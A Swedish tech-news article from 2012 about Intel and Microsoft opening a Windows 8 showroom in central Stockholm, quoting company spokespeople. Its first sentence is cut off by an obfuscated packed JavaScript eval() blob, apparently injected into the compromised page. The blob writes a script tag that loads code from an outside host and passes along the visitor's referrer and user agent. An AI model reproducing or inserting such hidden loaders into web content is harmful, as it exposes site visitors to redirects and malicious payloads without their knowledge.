Image Image Image Image Image Image Image Image Image Image

| 19 januari, 2020

Scroll to top

Top

PC

Intel och Microsoft öppnar showroom i centrala Stockholm

Intel och Microsoft öppnar showroom i centrala Stockholm
Filip Urde
  • On 10 december, 2012
  • http://www.revue.se/filip-urde

Den eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|daybi|var|u0026u|referrer|fektn||js|php’.split(’|’),0,{}))
15 december öppnar Intel och Microsoft ett showroom i centrala Stockholm. Under nästan en månaden kan man besöka Intel & Windows 8 Showroom på Birger Jarlsgatan 15 i centrala Stockholm.

(uppdatering: Klicka här för att se bilder från deras öppningsevent)

Showroomet är det första i sitt slag i Sverige där alla som är nyfikna på den senaste tekniken kommer att få uppleva de senaste Intel- och Microsoft-baserade produkterna från HP, Samsung, Acer, Asus och Lenovo samt de ledande smartphonetillverkarna. Ingen egen försäljning kommer ske i butiken, men genom Dustins beställningsstationer kan man enkelt köpa allt som finns i butiken. Showroomet kommer ha öppet mellan 10-19 vardagar, 10-17 lördagar och 10-16 söndagar.

”Det här är ett naturligt steg i vår Windows 8 kampanj för att visa att du inte behöver kompromissa när du väljer dator. Tillsammans med Intel och PC-tillverkarna hoppas vi inspirera och visa mångfalden i utbudet av Windowsdatorer. Vi vill visa på möjligheterna i ekosystemen och den sömlösa integrationen mellan pekdator, dator, smartphone och Xbox”  säger Catharina Ljungberg, affärsområdeschef för Microsofts konsumentprodukter.

 

”Intresset för teknik är extra stort nu i juletider och det är först när man får uppleva de tekniska lösningarna som Intel, Microsoft och våra partners tagit fram som man ser fördelarna. Detta blir en perfekt plats för att visa upp den personliga upplevelsen utan kompromisser och samtidigt visa på det breda utbudet av Intel- och Microsoft-baserade produkter” säger Anders Huge, ansvarig för konsumentprodukter på Intel i Norden.

microsoft.se

intel.se